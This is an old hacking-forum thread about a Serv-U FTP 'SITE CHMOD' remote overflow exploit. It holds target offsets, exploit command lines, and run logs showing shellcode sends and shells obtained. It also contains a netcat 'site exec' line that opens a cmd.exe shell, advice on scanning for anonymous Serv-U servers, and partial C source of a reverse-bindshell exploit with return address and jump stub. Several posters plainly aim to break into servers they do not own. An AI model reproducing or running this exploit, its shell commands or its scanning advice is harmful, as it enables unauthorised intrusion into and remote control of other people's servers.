[type]: 0 0x7ffa4a1b Serv-U v3.0.0.20~v4.1.0.11 GB 2K/XP ALL 1 0x7ffa2186 Serv-U v3.0.0.20~v4.1.0.11 BG 2K/XP ALL 2 0x6dee6713 Serv-U v3.0.0.20~v4.1.0.11 KR 2K SP4 3 0x77886713 Serv-U v3.0.0.20~v4.1.0.11 EN 2K SP4 4 0x76b42a3a Serv-U v3.0.0.20~v4.1.0.11 EN XP SP1
have nice day
x1`
Jan 26 2004, 09:48 PM
what if u dont know the user and password?
also how do u type port ip port or ip:port
ADiCToJUeGO
Jan 26 2004, 09:48 PM
THX! Good Work
AlessandroIT
Jan 26 2004, 09:49 PM
I Think it don't work...It will crash all FTP SErver
h:\servu>servu -i *.*.*.* -t 0 -u alez -p alez -d temp -f 5554 -s 80 Serv-U FTPD 3.x/4.x "SITE CHMOD" remote overflow exploit V1.0 Bug found by kkqq kkqq@0x557.org, Code By lion (lion@cnhonker.net) Welcome to HUC website http://www.cnhonker.com;r
9:/temp/xxx [+] Connect to *.*.*.*:5554 success. [+] Recv: 220 Serv-U FTP Server v4.1 for WinSock ready... [+] Send: USER alez [+] Recv: 331 User name okay, need password. [+] Send: PASS alez [+] Recv: 230 User logged in, proceed. [+] Send: TYPE I [+] Recv: 200 Type set to I. [+] Send shellcode 808 bytes. [+] If you don't have a shell it didn't work. [+] Connect to shell... [-] Exploit seem failed.
h:\servu>
It Always say that
ThEWaTcHeR
Jan 26 2004, 10:00 PM
many thanks totof, i will test it
-=[MePhIsTo]=-
Jan 26 2004, 10:02 PM
many thx hope it works
jubbly
Jan 26 2004, 10:24 PM
thanx for this i'm gonna test it on my workbench pc and maybe update my or even stop using my serv-u
9:/c:\/xxxx [+] Connect to 192.168.0.4:5551 success. [+] Bind port on 192.168.0.4:1234 success. [+] Recv: 220 BB Microsoft FTP Service (Version 5.0). [+] Send: USER admin1 [+] Recv: 331 User name okay, need password. [+] Send: PASS cheffe01 [+] Recv: 230-blackblizzard server system [+] Send: PORT 192,168,0,4,4,210 [+] Recv: 230-blackblizzard server system [+] Send shellcode 791 bytes. [+] If you don't have a shell it didn't work. [+] Wait for shell...
but i didn't get a shell
black
Milka
Jan 26 2004, 10:36 PM
got the same as balckp0ster hmmz
Hellraiseruk
Jan 26 2004, 10:43 PM
herd it don't work but i give it ago cheerz m8
EXPLOiTED
Jan 26 2004, 11:40 PM
220- ñ 0 Hours [+] Send: PASS god [+] Recv: 220-|ñ 0 Minutes [+] Send: TYPE I [+] Recv: 220- ñ 7 Seconds [+] Send shellcode 807 bytes. [+] If you don't have a shell it didn't work. [+] Connect to shell... [-] Exploit seem failed.
C:\>
DAN..no shell yet.....Good work..but lets get that shell working!
T3cHn0b0y
Jan 26 2004, 11:55 PM
Crashes the server but doesnt execute any arbitrary code or the correct code atleast.
Even if the exploit worked, the person would still need permission to create directories. Dangerous to RAQ admins etc I guess...but nobodies changing the directory structure of my FS except me!
Wolfman
Jan 27 2004, 04:37 AM
I'v made a few tests myself, and also without any luck. All i get is to stop the serv-u. Another "DoS" tool.
Tom
Jan 27 2004, 06:40 AM
U'r Site is down.
jubbly
Jan 27 2004, 07:49 AM
/me feels a little stupid but what is cbhost?
also blackP0ster from the banner you recieved your trying it against the wrong kind of ftp server d'oh unless it's customised
CODE
[+] Recv: 220 BB Microsoft FTP Service (Version 5.0).
doesn't exactly look like serv-u does it?
^RB^
Jan 27 2004, 09:31 AM
QUOTE (jubbly @ Jan 27 2004, 08:49 AM)
/me feels a little stupid but what is cbhost?
also blackP0ster from the banner you recieved your trying it against the wrong kind of ftp server d'oh unless it's customised
CODE
[+] Recv: 220 BB Microsoft FTP Service (Version 5.0).
doesn't exactly look like serv-u does it?
In Serv-U you can put whatever you want in that line... And since he was testing it on his own network (192.168.*.*) I *think* he's pretty sure he was using Serv-U...
Thanks for the tool though!!!!
^RB^
OleaSTeR
Jan 27 2004, 12:27 PM
this exploit work fine ...
c:\>servu -i 192.168.0.1 -t 3 -u oleaster -p XXXX -f 21 -c 127.0.0.1 -s 5555 Serv-U FTPD 3.x/4.x "SITE CHMOD" remote overflow exploit V1.0 Bug found by kkqq kkqq@0x557.org, Code By lion (lion@cnhonker.net) Welcome to HUC website http://www.cnhonker.com;r
dir Volume in drive C has no label. Volume Serial Number is F401-144A
Directory of C:\ ... ... ...
==========
target description:
Serv-U FTP Server v4.2 beta (4.1.0.8)
Kernel version: Microsoft Windows 2000, Uniprocessor Free Product type: Server Product version: 5.0 Service pack: 4 Kernel build number: 2195
=============
x1`
Jan 27 2004, 01:34 PM
what the point in hacking it if i know the password ? it would be better for a exploit with no pass needed
Thom
Jan 27 2004, 01:46 PM
I agree with dicky, whats the point? If you got pass and user you can always, site exec nc.exe -d -t -L -p 666 -e cmd.exe...
Double-=V=-
Jan 27 2004, 01:59 PM
There are many anonymous serv-u ftp servers who allow anymous to make dirs.
Checkz
Jan 27 2004, 02:13 PM
QUOTE (Double-=V=- @ Jan 27 2004, 01:59 PM)
There are many anonymous serv-u ftp servers who allow anymous to make dirs.
never saw one
AlessandroIT
Jan 27 2004, 02:22 PM
QUOTE (Checkz @ Jan 27 2004, 02:13 PM)
QUOTE (Double-=V=- @ Jan 27 2004, 01:59 PM)
There are many anonymous serv-u ftp servers who allow anymous to make dirs.
never saw one
The most part of anonymous
It work perfectly!!!
ivan288
Jan 27 2004, 02:32 PM
nice work guys will try it. thanx
Soulwax
Jan 27 2004, 03:01 PM
Thx alot gonna check this on out, I'll tell later if it worked for me.
Soulwax
blackP0ster
Jan 27 2004, 03:05 PM
i've changed my banner..workin with serv-u 4.1
but what's the effect of that exploit? if you have the user+pwd of a ftp server and the rights, you can always do what you want. don't need that exploit, don't i?
jead99
Jan 27 2004, 03:22 PM
Thanks for sharing the info, the exploit works fine
x1`
Jan 27 2004, 03:25 PM
so do u leave it blank if its anonymous or what ? what would the command look like
x1`
Jan 27 2004, 04:24 PM
ok whats the best way to scan for this ,
i used dsns scanner for port 21 then fx scanner to test for anonymous login how can i load a list of ips that will get the servu banners only
Double-=V=-
Jan 27 2004, 04:54 PM
If i would scan for this, I would do scan500, then scanline, then grim's ping.
BLaCkOuT
Jan 27 2004, 05:44 PM
nice work
night^man
Jan 27 2004, 06:26 PM
thx very nice work perfectly ;]
seppel18
Jan 28 2004, 12:16 AM
dont work for me
testet with servu 4.1.0.3 on Win2k SP4 English with 0x77886713 offset
No shell....
Anarchy
Jan 29 2004, 03:23 AM
#3
CODE
/* date: 25 janv 2004 software: Serv-U 4.1.0.0 (prolly others) vendor: RhinoSoft, http://www.serv-u.com/ credits: kkqq <kkqq@0x557.org>, http://www.0x557.org/release/servu.txt greets: rosecurity team, int3liban notes: should work on any NT, reverse bindshell, terminates the process properly handle directories author: mandragore, sploiting@mandragore.solidshells.com
cheap changelog: 27 jan 2004 improved banners handling (select()'s), added listener, default ip gathering (needs ifconfig & gawk)
if (FD_ISSET(0,&fds)) { ret = read(1,buff,4096); send(sn,buff,ret,0); }
if (FD_ISSET(sn,&fds)) { if ( (ret=recv(sn,buff,4096,0)) < 1 ) fatal("[-] shell.recv"); write(1,buff,ret); }
}
}
void killchild() { printf("[-] got signal from parent, exiting.\n"); exit(1); }
void killmain() { printf("[-] got signal from child, exiting.\n"); exit(1); }
int main(int argc, char **argv) { short port=21; int target=0; int i, pid;
int delta=423; int callebx=0x10077A92; // libeay32.dll char jmpback[]="\xe9\xff\xfe\xff\xff\xeb\xf9\x90\x90"; // jmp -256 char chmod[]="SITE CHMOD 777 ";
printf("[%%] Serv-u v4.1.0.0 sploit by mandragore (v2)\n");
lhost=getip();
if (argc<2) usage(argv[0]);
while((i = getopt(argc, argv, "d:p:u:s:w:H:P:v:"))!= EOF) { switch (i) { case 'd': target=inet_addr(optarg); break; case 'p': port=atoi(optarg); break; case 'u': user=optarg; break; case 's': pass=optarg; break; case 'w': path=optarg; break; case 'H': lhost=inet_addr(optarg); break; case 'P': lport=atoi(optarg); break; case 'v': verbose=atoi(optarg); break; default: usage(argv[0]); break; } }
if ((target==-1) || (lhost==-1) || (lhost==0)) usage(argv[0]);
printf("[.] if working you'll have a shell on %s:%d.\n", \ inet_ntoa(*(struct in_addr *)&lhost),lport); printf("[.] launching attack on ftp://%s:%s@%s:%d%s\n", \ user,pass,inet_ntoa(*(struct in_addr *)&target),port,path);
...
